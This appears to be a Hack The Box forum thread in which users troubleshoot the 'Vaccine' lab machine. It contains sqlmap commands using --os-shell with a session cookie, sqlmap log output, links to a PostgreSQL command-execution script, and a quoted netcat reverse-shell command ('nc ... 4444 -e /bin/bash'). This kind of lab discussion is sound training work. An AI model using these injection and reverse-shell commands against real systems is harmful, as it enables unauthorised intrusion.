Machine name: vaccine stuck on getting SQL code execution shell

Hi forum, a bit stuck here on starting point machine vaccine.

Everything has gone well so far up until the point that I attempt to get code execution with sqlmap.

Running the command below identifies multiple injection points. Good, as expected.
sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=73jv7pdmjsv7dsspoqtnlv66ls"

Then running:
sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=73jv7pdmjsv7dsspoqtnlv66ls" --os-shell

Causes a connection timeout. I lose my session on the page and have to close the browser and reopen it before I can get back to the login page. The ntework stays up and I can ping 10.10.10.46 when this happens.

After reopening the browser and getting a new PHP session ID I can rerun the commands above but they drop the connection again. Any ideas?

«1

Comments

  • Also just to add, I did update the command with the new PHP Session ID when this happened...

  • The same is happening to me. Voted to reset lab just in case. And yes, I tried with several PHP Sessions ID cookies.

    The connection always drop at this point:

    ...
    "testing if current user is DBA"

    And it just timeout.

  • same exact issue, apparently this isn't uncommon, https://forum.hackthebox.eu/discussion/2905/starting-point-machine-vaccine locked out of both EU and US now

  • Glad I stumbled upon this. I started Vaccine a little bit ago and kept running into connection timeout when issuing sqlmap command with --os-shell. Tried different session IDs and kept running into the same thing.

    Do you just wait it out at this point?

  • Today I came up to the same issue (EU server). Couple of hours later I tried again and it worked. Opening the address in browser also timed out when there was a problem with sqlmap.

  • ok good stuff thanks for confirming that> @redrom01 said:

    The same is happening to me. Voted to reset lab just in case. And yes, I tried with several PHP Sessions ID cookies.

    The connection always drop at this point:

    ...
    "testing if current user is DBA"

    And it just timeout.

    yep I had this too. Voting to reset.

  • I was the fifth reset vote. Its just reset.

  • Its still timing out for me though...

  • Hello,
    Any of you have issues with the version of PostgreSQL? After successfully running the sqlmap, i get the following:

    [13:57:17] [INFO] the back-end DBMS is PostgreSQL
    back-end DBMS: PostgreSQL
    [13:57:17] [INFO] fingerprinting the back-end DBMS operating system
    [13:57:17] [INFO] the back-end DBMS operating system is Linux
    [13:57:18] [INFO] testing if current user is DBA
    [13:57:18] [WARNING] the SQL query provided does not return any output
    [13:57:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
    [13:57:18] [INFO] retrieved:
    [13:57:18] [WARNING] unexpected HTTP code '302' detected. Will use (extra) validation step in similar cases

    [13:57:19] [INFO] detecting back-end DBMS version from its banner
    [13:57:19] [INFO] resumed: ''

    [13:57:19] [CRITICAL] unsupported feature on versions of PostgreSQL before 8.2

  • What command did you execute? I am about to test this again shortly i'll update the results after doing so.

  • Nope. I am still getting disconnected after running:

    sqlmap -u 'http://10.10.10.46/dashboard.php?search=a' --cookie="PHPSESSID=73jv7pdmjsv7dsspoqtnlv66ls" --os-shell

    sqlmap worked just fine without the --os-shell

  • @NeoCortex2000 Of course you can also do the injection manually. First, it would be a very good exercise, and second, it worked (I just tested it)

  • I got to thinking last night about alternative approaches to getting into this machine but was drawing blanks so thanks for the suggestion!

    Could you provide a little more detail on how one would approach manual injection please?

  • Hi all,

    I'm stuck on the machine as well, mainly because --os-shell in sqlmap times out and seems to invalidate my current session cookie.

    I've gotten to the point now where I can manually navigate the tables and run simple commands via code in the search box (e.g. run "ls" and print the output in the first column).

    Where I'm stuck now is getting shell or a reverse shell to run. Using any variation of "nc" just exits with error code 1 or 2.

    Appreciate any pointers!

    Thx!

  • Im still stuck on this too... pointers double appreciated!

  • @sechzehn If you can already navigate trough the tables your almost done. Think about what you could find in the tables? A username? Maybe a hashed password? On the machine ssh is activated with your gained information you could just simply login via ssh instead of trying to upload a shell ;)

  • I think it's not a problem with the machine itself but rather something caused by users messing around in /etc/postgresql since I had the same problem but was able to complete the machine successfully by exploiting immediately after a reset. Little tip: the section of the walktrough mentioning vim does not mean you have to edit the file!

  • Hello everyone,

    For those experiencing issues with port 80 interaction on Vaccine, please take note that as @drugantibus reported, this is due to users exiting their os-shell improperly. You will have to issue a reset vote every time Vaccine is unresponsive on port 80 or switch servers to find a working Vaccine SQL service.

    Thank you.

    Hack The Box
    Twitter
    Support Portal

    BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

    BMB___________________________________BOB

    BBB____________________________________BBB

    BBB____________________________________BBB

    BBB____________________________________BBB

    BBB____________________________________BBB

    BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

    BBBBB+++++++++++++++++++++++BBBBBB

    BBBBB++++BBBBBBBBB+++++++++BBBBBB

    BBBBB++++BBBBBBBBB+++++++++BBBBBB

    BBBBB++++BBBBBBBBB+++++++++BBBBBB

    BBBBB+++++++++++++++++++++++BBBBBB

    BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB



    Strive for more.

  • Type your comment> @0nenine9 said:

    Hello everyone,

    For those experiencing issues with port 80 interaction on Vaccine, please take note that as @drugantibus reported, this is due to users exiting their os-shell improperly. You will have to issue a reset vote every time Vaccine is unresponsive on port 80 or switch servers to find a working Vaccine SQL service.

    Thank you.

    I've been stuck on this for days now because people keep on crashing the server. Literally as soon is a reset vote is done someone almost IMMEDIATELY screws it up again... Very frustrating, especially as this is supposed to be a beginner box.

    Does VIP access include VIP access to the starting servers or only the servers past this point? At this stage I'm willing to just throw money at the issue so I can move on.

  • I've been stuck on this box for over a week. Im double frustrated as I bought VIP access when I first started but can't use it as this box is in my way.

    I was able to get the --os-shell to work earlier but then it timed out when I attempted to execute the reverse bash shell.

  • Getting through this box is going to need some stubborn determination I think. If anything its a good thing that its not working becuase its going to force us to think for ourselves and self learn what we don't know. There will be another way in I am sure.

  • I'm not using MSF, I'm trying to use it sparingly as I don't believe MSF is a very good tool for learning. I'm trying a manual exploit but I keep getting timeouts on port 80 which makes that kind of hard.

  • Hello,

    If you want to do it by hand you can follow this link:
    https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5

    And if someone prefers, I coded a python script available here:
    https://github.com/florianges/-HTB-Vaccine_sql_injection

    good luck

  • Hello,
    I have the same issue: time out when using the --os-shell option with sqlmap.
    Doing it manually (with florianges's python script) does not seem to solve the issue.

  • Same here with sqlmap and manually or with @florianges script, which is also not working and seems to fail after the last command: "ERROR: program "/tmp/XXXXX/nc 10.10.14.XX 4444 -e /bin/bash" failed DETAIL: command not found"

  • Type your comment> @florianges said:

    Hello,

    If you want to do it by hand you can follow this link:
    https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5

    And if someone prefers, I coded a python script available here:
    https://github.com/florianges/-HTB-Vaccine_sql_injection

    good luck

    Thanks for this really appreciate the assistance! I finally managed to root this box!

  • Hello,
    @SIFGU and @OS41380

    Did you open the script and read the comments and meet all of the requirements listed?
    Have you watched the youtube presentation video?

  • Type your comment> @Pyroteq said:

    Type your comment> @0nenine9 said:

    Hello everyone,

    For those experiencing issues with port 80 interaction on Vaccine, please take note that as @drugantibus reported, this is due to users exiting their os-shell improperly. You will have to issue a reset vote every time Vaccine is unresponsive on port 80 or switch servers to find a working Vaccine SQL service.

    Thank you.

    I've been stuck on this for days now because people keep on crashing the server. Literally as soon is a reset vote is done someone almost IMMEDIATELY screws it up again... Very frustrating, especially as this is supposed to be a beginner box.

    Does VIP access include VIP access to the starting servers or only the servers past this point? At this stage I'm willing to just throw money at the issue so I can move on.

    Hiya,

    Yes VIP includes a separate server for starting-point VIP. However, there's no assurance that VIP members will not create instability on the box, as the number of VIP servers for starting-point is smaller than that of main machines.

    Maybe try tackling the machine at a different time of day.

    Thanks!

    Hack The Box
    Twitter
    Support Portal

    BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

    BMB___________________________________BOB

    BBB____________________________________BBB

    BBB____________________________________BBB

    BBB____________________________________BBB

    BBB____________________________________BBB

    BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

    BBBBB+++++++++++++++++++++++BBBBBB

    BBBBB++++BBBBBBBBB+++++++++BBBBBB

    BBBBB++++BBBBBBBBB+++++++++BBBBBB

    BBBBB++++BBBBBBBBB+++++++++BBBBBB

    BBBBB+++++++++++++++++++++++BBBBBB

    BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB



    Strive for more.

  • I guess the box is still stuck, I voted to reset the lab.

  • I really struggled on this one with the same issues, gave up on sqlmap and used @florianges ' Python script. Struggled to understand the nc parameter I was meant to set. Couldn't get it working at first but in the end I literally followed his video step by step, copied the bin file (cp /bin/nc .) into the same location as the web server and then it worked. I was just taking an nc.exe file and copying it into the location and then setting the parameter to nc.exe but that was wrong.

Sign In to comment.